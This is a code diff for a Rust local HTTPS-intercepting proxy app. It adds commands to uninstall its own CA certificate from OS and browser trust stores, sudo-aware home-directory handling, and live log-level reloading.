-1756,7 +1974,9 @@ fn background_thread(shared: Arc, rx: Receiver) { Ok(m) => m, Err(e) => { push_log(&shared2, &format!("[ui] MITM init failed: {}", e)); - shared2.state.lock().unwrap().running = false; + let mut s = shared2.state.lock().unwrap(); + s.running = false; + s.proxy_active = false; return; } }; @@ -1765,11 +1985,13 @@ fn background_thread(shared: Arc, rx: Receiver) { Ok(s) => s, Err(e) => { push_log(&shared2, &format!("[ui] proxy build failed: {}", e)); - shared2.state.lock().unwrap().running = false; + let mut st = shared2.state.lock().unwrap(); + st.running = false; + st.proxy_active = false; return; } }; - // `fronter()` is `None` in google_only (bootstrap) mode — the + // `fronter()` is `None` in direct mode — the // status panel's relay stats simply show no data in that case. 
*fronter_slot2.lock().await = server.fronter(); { @@ -1792,8 +2014,15 @@ fn background_thread(shared: Arc, rx: Receiver) { push_log(&shared2, &format!("[ui] proxy error: {}", e)); } - shared2.state.lock().unwrap().running = false; - shared2.state.lock().unwrap().started_at = None; + { + let mut st = shared2.state.lock().unwrap(); + st.running = false; + st.started_at = None; + // Self-exit path (e.g. bind error after startup, + // or normal shutdown without Cmd::Stop). The + // Stop handler clears this too — either is fine. + st.proxy_active = false; + } push_log(&shared2, "[ui] proxy stopped"); }); @@ -1819,8 +2048,10 @@ fn background_thread(shared: Arc, rx: Receiver) { } }); - shared.state.lock().unwrap().running = false; - shared.state.lock().unwrap().started_at = None; + let mut st = shared.state.lock().unwrap(); + st.running = false; + st.started_at = None; + st.proxy_active = false; } } @@ -1848,29 +2079,106 @@ fn background_thread(shared: Arc, rx: Receiver) { }); } Ok(Cmd::InstallCa) => { + // Share the cert-op flag with Remove CA so the two + // can't race. Gate and flip before spawning; the worker + // clears on exit. 
+ { + let mut st = shared.state.lock().unwrap(); + if st.cert_op_in_progress { + push_log( + &shared, + "[ui] cert op already in progress — ignoring duplicate install", + ); + continue; + } + st.cert_op_in_progress = true; + } let shared2 = shared.clone(); std::thread::spawn(move || { push_log(&shared2, "[ui] installing CA..."); let base = data_dir::data_dir(); - if let Err(e) = MitmCertManager::new_in(&base) { - push_log(&shared2, &format!("[ui] CA init failed: {}", e)); - return; - } - let ca = base.join(CA_CERT_FILE); - match install_ca(&ca) { - Ok(()) => { - push_log(&shared2, "[ui] CA install ok"); - let mut st = shared2.state.lock().unwrap(); + let result = (|| -> Result<(), String> { + if let Err(e) = MitmCertManager::new_in(&base) { + return Err(format!("CA init failed: {}", e)); + } + let ca = base.join(CA_CERT_FILE); + install_ca(&ca).map_err(|e| format!("CA install failed: {}", e)) + })(); + { + let mut st = shared2.state.lock().unwrap(); + st.cert_op_in_progress = false; + if result.is_ok() { st.ca_trusted = Some(true); st.ca_trusted_at = Some(Instant::now()); } - Err(e) => { - push_log(&shared2, &format!("[ui] CA install failed: {}", e)); + } + match result { + Ok(()) => push_log(&shared2, "[ui] CA install ok"), + Err(msg) => { + push_log(&shared2, &format!("[ui] {}", msg)); push_log(&shared2, "[ui] hint: run the terminal binary with sudo/admin: mhrv-rs --install-cert"); } } }); } + Ok(Cmd::RemoveCa) => { + // Authoritative proxy-active guard: the UI button is + // disabled when proxy_active/running is set, but a + // Cmd::RemoveCa may already be queued by the time the + // Start handler flips the flag. `active` is owned by + // this thread so its state is the real source of truth + // — reject removal any time a proxy handle is alive, + // whether it's still starting or fully running. 
+ if active.is_some() { + push_log( + &shared, + "[ui] cannot remove CA: proxy is running or starting — stop it first", + ); + continue; + } + // Shared cert-op gate: covers Install CA too, so back- + // to-back Install → Remove clicks can't race. The + // button is already disabled while this is set, but a + // queued command can still arrive here. + { + let mut st = shared.state.lock().unwrap(); + if st.cert_op_in_progress { + push_log( + &shared, + "[ui] cert op already in progress — ignoring duplicate remove", + ); + continue; + } + st.cert_op_in_progress = true; + } + let shared2 = shared.clone(); + std::thread::spawn(move || { + push_log(&shared2, "[ui] removing CA (trust store + files)..."); + let base = data_dir::data_dir(); + let result = remove_ca(&base); + { + let mut st = shared2.state.lock().unwrap(); + st.cert_op_in_progress = false; + if result.is_ok() { + st.ca_trusted = Some(false); + st.ca_trusted_at = Some(Instant::now()); + } + } + match result { + Ok(outcome) => { + push_log(&shared2, &format!("[ui] {}", outcome.summary())); + push_log( + &shared2, + "[ui] config.json and Apps Script deployment untouched", + ); + } + Err(e) => { + push_log(&shared2, &format!("[ui] CA remove failed: {}", e)); + push_log(&shared2, "[ui] hint: run the terminal binary with sudo/admin: mhrv-rs --remove-cert"); + } + } + }); + } Ok(Cmd::TestSni { google_ip, sni }) => { let shared2 = shared.clone(); { @@ -1915,7 +2223,21 @@ fn background_thread(shared: Arc, rx: Receiver) { std::thread::spawn(move || { let base = data_dir::data_dir(); let ca = base.join(CA_CERT_FILE); - let trusted = mhrv_rs::cert_installer::is_ca_trusted(&ca); + let file_exists = ca.exists(); + // Probe the trust store by name — independent of + // whether the on-disk ca.crt happens to be there. + // The file and the trust-store entry can be out of + // sync (e.g. after a partial removal), and that + // mismatch is exactly what Check CA must surface. 
+ let trusted = mhrv_rs::cert_installer::is_ca_trusted_by_name(); + push_log( + &shared2, + &format!( + "[ui] check CA: file={} trust_store={}", + if file_exists { "present" } else { "missing" }, + if trusted { "trusted" } else { "not trusted" }, + ), + ); let mut st = shared2.state.lock().unwrap(); st.ca_trusted = Some(trusted); st.ca_trusted_at = Some(Instant::now()); @@ -1930,7 +2252,10 @@ fn background_thread(shared: Arc, rx: Receiver) { } rt.spawn(async move { let result = mhrv_rs::update_check::check(route).await; - push_log(&shared2, &format!("[ui] update check: {}", result.summary())); + push_log( + &shared2, + &format!("[ui] update check: {}", result.summary()), + ); { let mut st = shared2.state.lock().unwrap(); st.last_update_check = Some(UpdateProbeState::Done(result)); @@ -1990,14 +2315,19 @@ fn background_thread(shared: Arc, rx: Receiver) { /// Install a tracing subscriber that mirrors every log event into the UI's /// Recent log panel. /// -/// Respects `RUST_LOG` if set. Otherwise defaults to `info` — which is what -/// users mean when they pick a non-default log level in the form. (trace / -/// debug flip too much noise for a local GUI, so the combo-box changes level -/// live via the `reload` handle that `with_env_filter` gives us but we keep -/// the default boot-time level at info so first-run behavior is sensible.) -fn install_ui_tracing(shared: Arc) { +/// Filter precedence (issue #401, v1.8.2): +/// 1. `RUST_LOG` env var, if set +/// 2. The saved form's `log_level` (passed in from the loaded config) +/// 3. `info,hyper=warn` as a sensible default +/// +/// The constructed filter is wrapped in a `reload::Layer` and the handle +/// is stashed in `LOG_RELOAD` so that a Save inside the running UI can +/// reinstall the filter without a restart. See `apply_log_level`. 
+fn install_ui_tracing(shared: Arc, config_level: &str) { use tracing_subscriber::fmt::MakeWriter; - use tracing_subscriber::EnvFilter; + use tracing_subscriber::layer::SubscriberExt; + use tracing_subscriber::util::SubscriberInitExt; + use tracing_subscriber::{reload, EnvFilter}; /// A MakeWriter that pushes each line into the shared log panel. struct UiLogWriter { @@ -2051,19 +2381,71 @@ fn install_ui_tracing(shared: Arc) { } } - let filter = - EnvFilter::try_from_default_env().unwrap_or_else(|_| EnvFilter::new("info,hyper=warn")); + // RUST_LOG > config.log_level > "info,hyper=warn" + let filter = EnvFilter::try_from_default_env().unwrap_or_else(|_| { + let trimmed = config_level.trim(); + if trimmed.is_empty() { + EnvFilter::new("info,hyper=warn") + } else { + EnvFilter::try_new(trimmed).unwrap_or_else(|_| EnvFilter::new("info,hyper=warn")) + } + }); + + let (filter_layer, reload_handle) = reload::Layer::new(filter); + if LOG_RELOAD.set(reload_handle).is_err() { + // Already initialized — install_ui_tracing got called twice. Bail + // silently rather than panic; the existing subscriber stays live. + return; + } let writer = UiLogWriter { shared }; - let _ = tracing_subscriber::fmt() - .with_env_filter(filter) + let fmt_layer = tracing_subscriber::fmt::layer() .with_target(false) .with_ansi(false) - .with_writer(writer) + .with_writer(writer); + + let _ = tracing_subscriber::registry() + .with(filter_layer) + .with(fmt_layer) .try_init(); } +/// Reload handle for the UI's tracing EnvFilter — populated once at startup +/// by `install_ui_tracing`. `apply_log_level` uses it to swap in a new +/// filter when the user clicks Save with a different log level (#401). +static LOG_RELOAD: std::sync::OnceLock< + tracing_subscriber::reload::Handle< + tracing_subscriber::EnvFilter, + tracing_subscriber::Registry, + >, +> = std::sync::OnceLock::new(); + +/// Reinstall the tracing filter at runtime. 
Called from the Save handler +/// so the user's new `log_level` takes effect without a restart. RUST_LOG +/// still wins if it was set at process start — explicit override beats +/// config in both directions. +fn apply_log_level(level: &str) { + use tracing_subscriber::EnvFilter; + let Some(handle) = LOG_RELOAD.get() else { + return; + }; + if std::env::var_os("RUST_LOG").is_some() { + // RUST_LOG was set explicitly at boot — don't silently override. + return; + } + let trimmed = level.trim(); + let new = if trimmed.is_empty() { + EnvFilter::new("info,hyper=warn") + } else { + match EnvFilter::try_new(trimmed) { + Ok(f) => f, + Err(_) => return, + } + }; + let _ = handle.modify(|f| *f = new); +} + /// Where we drop downloaded release assets. Prefer the OS user Downloads /// dir (via the directories crate that's already in our tree), fall back /// to the user-data dir for platforms that don't expose one (edge case). diff --git a/src/cert_installer.rs b/src/cert_installer.rs index 0d6eb21e..caff2835 100644 --- a/src/cert_installer.rs +++ b/src/cert_installer.rs @@ -1,7 +1,7 @@ -use std::path::Path; +use std::path::{Path, PathBuf}; use std::process::Command; -use crate::mitm::CERT_NAME; +use crate::mitm::{CA_DIR, CERT_NAME}; #[derive(Debug, thiserror::Error)] pub enum InstallError { @@ -11,6 +11,180 @@ pub enum InstallError { Failed, #[error("unsupported platform: {0}")] Unsupported(String), + #[error("io {path}: {source}")] + Io { + path: PathBuf, + #[source] + source: std::io::Error, + }, + #[error("CA still trusted after removal — re-run with admin/sudo")] + RemovalIncomplete, +} + +/// Structured outcome of a successful `remove_ca` call. The OS trust +/// store is always fully clean when we return `Ok(_)` (that's verified +/// by `is_ca_trusted_by_name` before file deletion), but NSS cleanup is +/// best-effort — callers need the nuance to print accurate status. 
+/// +/// UI/CLI should treat `Clean` as "nothing more to do" and +/// `NssIncomplete` as a non-fatal warning ("OS CA removed, browser +/// cleanup partial — follow the logged hint"). +#[derive(Debug, Clone, Copy)] +pub enum RemovalOutcome { + Clean, + NssIncomplete(NssReport), +} + +impl RemovalOutcome { + /// One-line summary suitable for a log line or status banner. + pub fn summary(&self) -> String { + match self { + RemovalOutcome::Clean => "CA removed.".to_string(), + RemovalOutcome::NssIncomplete(r) if r.tool_missing_with_stores_present => { + "OS CA removed. NSS cleanup skipped — NSS certutil not found.".to_string() + } + RemovalOutcome::NssIncomplete(r) => format!( + "OS CA removed. NSS cleanup partial: {}/{} browser stores updated.", + r.ok, r.tried + ), + } + } +} + +/// When running as root via `sudo`, the process's `HOME` / `USER` +/// environment reflects **root**, not the user who invoked the command. +/// That breaks every user-scoped cert path this module touches — +/// `data_dir()` resolves to root's config dir, `firefox_profile_dirs()` +/// scans root's profiles, macOS `login.keychain-db` is root's. The +/// removal then operates on paths that probably don't exist, reports +/// success, and leaves the real user's CA trusted. +/// +/// This helper detects the real `sudo` case (`geteuid() == 0` AND +/// `SUDO_USER` set to a non-root user), resolves the invoking user's +/// home dir (SUDO_HOME, `getent passwd`, or `/Users/$SUDO_USER` / +/// `/home/$SUDO_USER` fallback), and rewrites `HOME` for the remainder +/// of the process. The EUID gate is load-bearing: `SUDO_USER` alone is +/// not proof of elevation (a user can export it, inherit it, or use +/// `sudo -E`), and blindly trusting it would let a non-root process +/// redirect config/CA/profile operations to another user's files. +/// Call once at the top of `main` in every binary (CLI + UI) before +/// anything else reads HOME. 
No-op on Windows (UAC keeps the user's +/// HOME intact) and on non-sudo Unix invocations. +pub fn reconcile_sudo_environment() { + #[cfg(unix)] + unix::reconcile_sudo_home(); +} + +#[cfg(unix)] +mod unix { + use super::{should_reconcile_for, sudo_parse_passwd_home}; + use std::path::Path; + use std::process::Command; + + pub(super) fn reconcile_sudo_home() { + // SAFETY: geteuid() is async-signal-safe and cannot fail. + let euid = unsafe { libc::geteuid() }; + let sudo_user_raw = std::env::var("SUDO_USER").ok(); + let Some(sudo_user) = should_reconcile_for(euid, sudo_user_raw.as_deref()) else { + return; + }; + let sudo_user = sudo_user.to_string(); + match resolve_home(&sudo_user) { + Some(home) => { + tracing::info!( + "Detected sudo invocation (SUDO_USER={}): re-rooting HOME to {} \ + so user-scoped cert paths target the real user.", + sudo_user, + home + ); + // SAFETY: reconcile_sudo_environment runs at the top of + // main() before any other thread is spawned and before + // any code has cached HOME. + std::env::set_var("HOME", home); + } + None => { + tracing::warn!( + "Running under sudo (SUDO_USER={}), but could not resolve \ + the user's home dir. Cert paths will operate on root's \ + HOME — which may NOT match where you installed the CA. \ + Prefer running without sudo; the app invokes sudo \ + internally for system-level steps.", + sudo_user + ); + } + } + } + + fn resolve_home(sudo_user: &str) -> Option { + // Some sudoers configs export SUDO_HOME; prefer it when present. + if let Ok(h) = std::env::var("SUDO_HOME") { + if !h.is_empty() { + return Some(h); + } + } + // Linux: `getent passwd ` returns the full passwd entry. + if let Ok(out) = Command::new("getent").args(["passwd", sudo_user]).output() { + if out.status.success() { + let line = String::from_utf8_lossy(&out.stdout); + if let Some(h) = sudo_parse_passwd_home(&line) { + return Some(h); + } + } + } + // macOS has no getent. 
Fall back to the convention for both + // platforms — verify the dir actually exists before returning. + for root in ["/Users", "/home"] { + let candidate = format!("{}/{}", root, sudo_user); + if Path::new(&candidate).exists() { + return Some(candidate); + } + } + None + } +} + +/// Decide whether to re-root HOME for a sudo-style invocation, given a +/// process's effective UID and the value of the `SUDO_USER` env var. +/// Returns `Some(user)` if and only if we should re-root HOME to that +/// user's dir; `None` in every other case (normal user, real root +/// login without sudo, SUDO_USER missing / empty / literally "root"). +/// +/// Extracted as a pure function so every branch — including the +/// load-bearing `euid == 0 && SUDO_USER unset` path that must leave +/// HOME as root's own /root — can be asserted with unit tests. +/// Always compiled so the tests run on every host. +fn should_reconcile_for<'a>(euid: u32, sudo_user: Option<&'a str>) -> Option<&'a str> { + // EUID gate: if we're not actually root, `SUDO_USER` could be + // anything (inherited from a shell init, explicitly exported, + // set via `sudo -E`) and rewriting HOME based on it would let a + // normal-user process redirect cert paths to someone else's files. + if euid != 0 { + return None; + } + // Real root login (no sudo) — SUDO_USER is simply unset. Do NOT + // re-root: root's own /root is the correct HOME for that process. + let user = sudo_user?; + // Empty string or literal "root" also mean "nothing to reconcile". + if user.is_empty() || user == "root" { + return None; + } + Some(user) +} + +/// Pure parser for a single-line `getent passwd` entry. +/// Always compiled so unit tests can run on every host. 
+fn sudo_parse_passwd_home(content: &str) -> Option<String> {
+    let line = content.lines().next()?;
+    let fields: Vec<&str> = line.split(':').collect();
+    // passwd format: name:pw:uid:gid:gecos:home:shell
+    if fields.len() < 7 {
+        return None;
+    }
+    let home = fields[5].trim();
+    if home.is_empty() {
+        return None;
+    }
+    Some(home.to_string())
 }
 
 /// Install the CA certificate at `path` into the system trust store.
@@ -46,12 +220,108 @@ pub fn install_ca(path: &Path) -> Result<(), InstallError> {
     }
 }
 
+/// Remove the CA from the OS trust store, best-effort NSS stores (Firefox
+/// profiles + Chrome/Chromium on Linux), and delete the on-disk
+/// `ca/ca.crt` + `ca/ca.key`. A fresh CA will be regenerated the next
+/// time the proxy starts — and since the Apps Script deployment lives on
+/// Google's side and `config.json` is never touched here, the user does
+/// not have to redeploy `Code.gs` or re-enter their deployment ID.
+/// Platform-specific — may require admin/sudo for system stores.
+///
+/// Safety property: we verify the OS trust store with `is_ca_trusted`
+/// before deleting `ca/`. If the stale root is still trusted (e.g.
+/// because the system-store delete needed admin and we didn't have it),
+/// we return `RemovalIncomplete` and leave the on-disk files alone — a
+/// regenerated CA with a fresh keypair would otherwise mismatch the
+/// stale trusted root and silently break every HTTPS MITM leaf.
+pub fn remove_ca(base: &Path) -> Result<RemovalOutcome, InstallError> {
+    let os = std::env::consts::OS;
+    tracing::info!("Removing CA certificate on {}...", os);
+
+    // Platforms that merge anchor files into a bundle/database (Linux)
+    // must report whether the refresh step succeeded — the bundle may
+    // still contain the CA even after the anchor file is gone. macOS
+    // and Windows write directly to their stores, so there's nothing
+    // separate to refresh; they rely entirely on the by-name probe.
+ let platform_ok = match os { + "macos" => { + remove_macos(); + true + } + "linux" => remove_linux(), + "windows" => { + remove_windows(); + true + } + other => return Err(InstallError::Unsupported(other.to_string())), + }; + + // Verify OS trust store removal BEFORE touching browser state. If + // the OS removal didn't actually land (e.g. machine-store delete + // needed admin we don't have, or a Linux refresh cmd failed), we + // must not also strip NSS entries + the Firefox enterprise_roots + // pref — that leaves the system in an inconsistent "half-removed" + // state (OS still trusts, but Firefox is newly reconfigured) that + // only confuses the user. Returning RemovalIncomplete here keeps + // the install pristine so a retry is idempotent. + // + // Must be path-independent — the on-disk cert file may already be + // missing for unrelated reasons, and a file-gated check would then + // mask a still-trusted stale root. + if !platform_ok || is_ca_trusted_by_name() { + tracing::error!( + "MITM CA is still trusted after OS removal attempt \ + (platform_ok={}) — refusing to touch browser state or \ + delete on-disk files. Re-run with admin/sudo to complete \ + revocation.", + platform_ok + ); + return Err(InstallError::RemovalIncomplete); + } + + // OS store is clean — only now mutate browser state. + let nss = remove_nss_stores(); + + let ca_dir = base.join(CA_DIR); + if ca_dir.exists() { + if let Err(e) = std::fs::remove_dir_all(&ca_dir) { + tracing::error!("failed to delete {}: {}", ca_dir.display(), e); + return Err(InstallError::Io { + path: ca_dir.clone(), + source: e, + }); + } + tracing::info!("Deleted CA files at {}", ca_dir.display()); + } + + if nss.is_clean() { + Ok(RemovalOutcome::Clean) + } else { + Ok(RemovalOutcome::NssIncomplete(nss)) + } +} + /// Heuristic check: is the CA already in the trust store? /// Best-effort — on unknown state we return false to always attempt install. 
+/// +/// The `path` guard skips the trust-store probe when the local CA file +/// is missing, because at install time "no file = nothing to trust" is a +/// useful shortcut. Revocation uses `is_ca_trusted_by_name` instead — +/// that path must verify the store regardless of whether the file still +/// exists, otherwise a pre-deleted `ca.crt` would mask a lingering +/// trusted root. pub fn is_ca_trusted(path: &Path) -> bool { if !path.exists() { return false; } + is_ca_trusted_by_name() +} + +/// Path-independent variant of `is_ca_trusted`: queries the OS trust +/// store by cert name (CERT_NAME) without requiring the on-disk cert +/// file. Used by `remove_ca` to verify revocation completed even if the +/// local `ca.crt` was already missing or deleted mid-flight. +pub fn is_ca_trusted_by_name() -> bool { match std::env::consts::OS { "macos" => is_trusted_macos(), "linux" => is_trusted_linux(), @@ -115,6 +385,73 @@ fn install_macos(cert_path: &str) -> bool { false } +/// Delete the CA from the login keychain (no sudo) and, only when a +/// probe confirms the cert actually lives there, the system keychain +/// (sudo). Probing first avoids prompting the user — or hanging the +/// UI's GUI-spawned `sudo` — for a password they don't need when the +/// cert was only ever installed in the login keychain (the default +/// path). Exit status is best-effort: `security delete-certificate` +/// exits non-zero for "not found", which is indistinguishable from +/// real failures, so the final trust state is verified by the caller +/// via `is_ca_trusted_by_name`. 
+fn remove_macos() { + let home = std::env::var("HOME").unwrap_or_default(); + let login_kc_db = format!("{}/Library/Keychains/login.keychain-db", home); + let login_kc = format!("{}/Library/Keychains/login.keychain", home); + let login_keychain = if Path::new(&login_kc_db).exists() { + login_kc_db + } else { + login_kc + }; + + let res = Command::new("security") + .args(["delete-certificate", "-c", CERT_NAME, &login_keychain]) + .status(); + if matches!(res, Ok(s) if s.success()) { + tracing::info!("Removed CA from login keychain."); + } + + if macos_system_keychain_has() { + let res = Command::new("sudo") + .args([ + "security", + "delete-certificate", + "-c", + CERT_NAME, + "/Library/Keychains/System.keychain", + ]) + .status(); + if matches!(res, Ok(s) if s.success()) { + tracing::info!("Removed CA from System keychain."); + } else { + tracing::warn!( + "System keychain still has the CA and the sudo delete did not \ + succeed — re-run with an admin password available." + ); + } + } +} + +/// Probe-without-sudo: does the System keychain currently contain our +/// cert? `security find-certificate` against the system keychain path +/// does not require admin; only `delete-certificate` does. Used to +/// decide whether to escalate at all. 
+fn macos_system_keychain_has() -> bool { + let out = Command::new("security") + .args([ + "find-certificate", + "-a", + "-c", + CERT_NAME, + "/Library/Keychains/System.keychain", + ]) + .output(); + match out { + Ok(o) => o.status.success() && !o.stdout.is_empty(), + Err(_) => false, + } +} + fn is_trusted_macos() -> bool { let out = Command::new("security") .args(["find-certificate", "-a", "-c", CERT_NAME]) @@ -142,7 +479,10 @@ fn install_linux(cert_path: &str) -> bool { try_copy_and_run(cert_path, &dest, &[&["update-ca-trust", "extract"]]) } "arch" => { - let dest = format!("/etc/ca-certificates/trust-source/anchors/{}.crt", safe_name); + let dest = format!( + "/etc/ca-certificates/trust-source/anchors/{}.crt", + safe_name + ); try_copy_and_run(cert_path, &dest, &[&["trust", "extract-compat"]]) } "openwrt" => { @@ -154,7 +494,8 @@ fn install_linux(cert_path: &str) -> bool { "OpenWRT detected: the router doesn't need to trust the MITM CA. \ Copy {} to each LAN client (browser / OS trust store) instead. \ Example: scp root@:{} ./ and import from there.", - cert_path, cert_path + cert_path, + cert_path ); true } @@ -253,7 +594,11 @@ fn classify_os_release(content: &str) -> String { Some(x) => x, None => continue, }; - let v = v.trim().trim_matches('"').trim_matches('\'').to_ascii_lowercase(); + let v = v + .trim() + .trim_matches('"') + .trim_matches('\'') + .to_ascii_lowercase(); match k.trim() { "ID" => id = v, "ID_LIKE" => id_like = v, @@ -281,13 +626,103 @@ fn classify_os_release(content: &str) -> String { "unknown".into() } +/// Mirror of `install_linux`: for each known anchor dir, delete our cert +/// file and run the corresponding refresh command. Tries without sudo +/// first, falls back to sudo. Missing files are silently skipped — +/// removal is idempotent. +/// +/// Key safety behavior: we refresh the trust bundle **regardless of +/// whether we found an anchor file to delete**. 
The concern is a retry +/// after a prior run that deleted the anchor but failed to refresh — +/// leaving the merged bundle still containing our PEM. On the next +/// invocation the anchor dir is empty, so a "delete file, then refresh" +/// contract would skip the refresh entirely and `remove_ca` would see +/// no anchor file left, declare success, and delete `ca/` while the +/// stale root is still trusted. Running the refresh unconditionally +/// catches this. +/// +/// Returns `false` if any refresh command failed — callers must then +/// abort file deletion so a regenerated CA with a fresh keypair can't +/// mismatch the stale root. +fn remove_linux() -> bool { + let safe_name = CERT_NAME.replace(' ', "_"); + let anchors: &[(&str, &[&str])] = &[ + ( + "/usr/local/share/ca-certificates", + &["update-ca-certificates"], + ), + ( + "/etc/pki/ca-trust/source/anchors", + &["update-ca-trust", "extract"], + ), + ( + "/etc/ca-certificates/trust-source/anchors", + &["trust", "extract-compat"], + ), + ]; + + let mut all_ok = true; + for (dir, refresh) in anchors { + // Skip distros whose anchor dir doesn't exist — running their + // refresh tool (e.g. `trust extract-compat` on a Debian host) + // would just error out and falsely mark the removal as failed. + if !Path::new(dir).exists() { + continue; + } + + let path = format!("{}/{}.crt", dir, safe_name); + let anchor_present = Path::new(&path).exists(); + if anchor_present { + let deleted = + std::fs::remove_file(&path).is_ok() || run_cmd(&["sudo", "rm", "-f", &path]); + if !deleted { + tracing::warn!("failed to remove {}", path); + all_ok = false; + continue; + } + } + + // Always refresh — see doc comment for the retry-safety rationale. 
+ let refreshed = run_cmd(refresh) || { + let mut full: Vec<&str> = vec!["sudo"]; + full.extend_from_slice(refresh); + run_cmd(&full) + }; + if !refreshed { + tracing::error!( + "refresh {:?} failed for {} — CA may still be trusted via the merged bundle", + refresh, + dir + ); + all_ok = false; + } else if anchor_present { + tracing::info!("Removed CA from {} (bundle refreshed).", dir); + } else { + tracing::debug!("Refreshed {} bundle (nothing to delete here).", dir); + } + } + all_ok +} + fn is_trusted_linux() -> bool { - let anchor_dirs = [ + // Check both the anchor dirs (what we write into on install) and + // the post-extract dirs (where update-ca-certificates / `trust + // extract-compat` etc. copy or symlink our PEM after refresh). + // Checking the post-extract side catches the "anchor file already + // removed but bundle not regenerated" case on a retry — if we only + // looked at anchor dirs, a `remove_ca` retry after a prior refresh + // failure could declare success while the merged bundle still + // contains our stale root. + let dirs = [ "/usr/local/share/ca-certificates", "/etc/pki/ca-trust/source/anchors", "/etc/ca-certificates/trust-source/anchors", + // Post-extract locations: + "/etc/ssl/certs", + "/etc/pki/ca-trust/extracted/pem/directory-hash", + "/etc/ca-certificates/extracted/cadir", ]; - for d in anchor_dirs { + for d in dirs { if let Ok(entries) = std::fs::read_dir(d) { for e in entries.flatten() { let name = e.file_name(); @@ -310,24 +745,33 @@ fn is_trusted_linux() -> bool { /// false on Windows, so the Check-CA button was misleading users into /// reinstalling a cert that was already trusted. fn is_trusted_windows() -> bool { - // `certutil -user -store Root ` prints the matching cert entries - // on success (stdout), and exits with a non-zero code plus a "Not - // found" message if nothing matches. We also check stdout for the - // cert name because certutil in some locales returns 0 even on no- - // match, just with empty output. 
- for args in [ - vec!["-user", "-store", "Root", CERT_NAME], - vec!["-store", "Root", CERT_NAME], - ] { - let out = Command::new("certutil").args(&args).output(); - if let Ok(o) = out { + windows_store_has(true) || windows_store_has(false) +} + +/// Query a single Windows Trusted Root store for our CA. +/// `user = true` hits the current-user store (no admin needed); +/// `user = false` hits the machine store. `certutil -store Root ` +/// prints the matching cert entries on success and exits non-zero with +/// "Not found" if nothing matches — we also check stdout for the cert +/// name because certutil in some locales returns 0 on no-match with +/// empty output. +fn windows_store_has(user: bool) -> bool { + let mut args: Vec<&str> = Vec::new(); + if user { + args.push("-user"); + } + args.extend(["-store", "Root", CERT_NAME]); + let out = Command::new("certutil").args(&args).output(); + match out { + Ok(o) => { let stdout = String::from_utf8_lossy(&o.stdout); - if o.status.success() && stdout.to_ascii_lowercase().contains(&CERT_NAME.to_ascii_lowercase()) { - return true; - } + o.status.success() + && stdout + .to_ascii_lowercase() + .contains(&CERT_NAME.to_ascii_lowercase()) } + Err(_) => false, } - false } fn install_windows(cert_path: &str) -> bool { @@ -355,6 +799,47 @@ fn install_windows(cert_path: &str) -> bool { false } +/// Delete from user and/or machine Trusted Root stores. We probe each +/// store first with `certutil -store` and only attempt the delete where +/// the cert actually lives — this avoids the confusing "needs elevation" +/// error that `-delstore Root` would print when the cert was only ever +/// installed in the per-user store (the default path for non-admin +/// runs). Final state is verified by the caller via `is_ca_trusted`. 
+fn remove_windows() { + let mut any = false; + + if windows_store_has(true) { + let res = Command::new("certutil") + .args(["-delstore", "-user", "Root", CERT_NAME]) + .status(); + if matches!(res, Ok(s) if s.success()) { + tracing::info!("Removed CA from Windows user Trusted Root store."); + any = true; + } else { + tracing::warn!("failed to remove CA from Windows user Trusted Root store"); + } + } + + if windows_store_has(false) { + let res = Command::new("certutil") + .args(["-delstore", "Root", CERT_NAME]) + .status(); + if matches!(res, Ok(s) if s.success()) { + tracing::info!("Removed CA from Windows machine Trusted Root store."); + any = true; + } else { + tracing::warn!( + "failed to remove CA from Windows machine Trusted Root store \ + (run as administrator to complete)" + ); + } + } + + if !any { + tracing::info!("No MITM CA found in Windows Trusted Root stores."); + } +} + // ---------- NSS (Firefox + Chrome/Chromium on Linux) ---------- /// Best-effort install of the CA into all discovered NSS stores: @@ -440,43 +925,36 @@ fn install_nss_stores(cert_path: &str) { /// certutil isn't typically installed so the certutil-based path doesn't /// fire there. /// -/// Existing user.js entries for other prefs are preserved by appending -/// rather than truncating. Idempotent. +/// We tag the block we write with a sentinel marker comment on the line +/// above the pref, so uninstall can prove ownership before removing it — +/// the user may have had `security.enterprise_roots.enabled = true` +/// before this app existed, and we must not silently revoke their +/// setting. Idempotent. 
fn enable_firefox_enterprise_roots() { - const PREF: &str = r#"user_pref("security.enterprise_roots.enabled", true);"#; let mut touched = 0; for profile in firefox_profile_dirs() { let user_js = profile.join("user.js"); let existing = std::fs::read_to_string(&user_js).unwrap_or_default(); - if existing.contains("security.enterprise_roots.enabled") { - // Already set by us or the user. Replace-or-keep: if they set it - // to false we leave their choice alone. If it's already our line - // verbatim, nothing to do. - if existing.contains(PREF) { - continue; + match add_enterprise_roots_block(&existing) { + EnterpriseRootsEdit::AddedBlock(new) => { + if let Err(e) = std::fs::write(&user_js, new) { + tracing::debug!( + "firefox profile {}: user.js write failed: {}", + profile.display(), + e + ); + continue; + } + touched += 1; + } + EnterpriseRootsEdit::AlreadyOurs => {} + EnterpriseRootsEdit::UserOwned => { + tracing::debug!( + "firefox profile {} already has a user-owned enterprise_roots pref; leaving alone", + profile.display() + ); } - // Different value present — don't overwrite. - tracing::debug!( - "firefox profile {} already has a different enterprise_roots pref; leaving alone", - profile.display() - ); - continue; - } - let mut out = existing; - if !out.is_empty() && !out.ends_with('\n') { - out.push('\n'); - } - out.push_str(PREF); - out.push('\n'); - if let Err(e) = std::fs::write(&user_js, out) { - tracing::debug!( - "firefox profile {}: user.js write failed: {}", - profile.display(), - e - ); - continue; } - touched += 1; } if touched > 0 { tracing::info!( @@ -486,16 +964,130 @@ fn enable_firefox_enterprise_roots() { } } +// ── Firefox enterprise_roots marker-block helpers (pure, testable) ── +// +// We write a two-line block into user.js — a sentinel comment followed +// by the pref itself. The marker proves we wrote it, so uninstall can +// distinguish our own line from a user-authored one with the same +// value. 
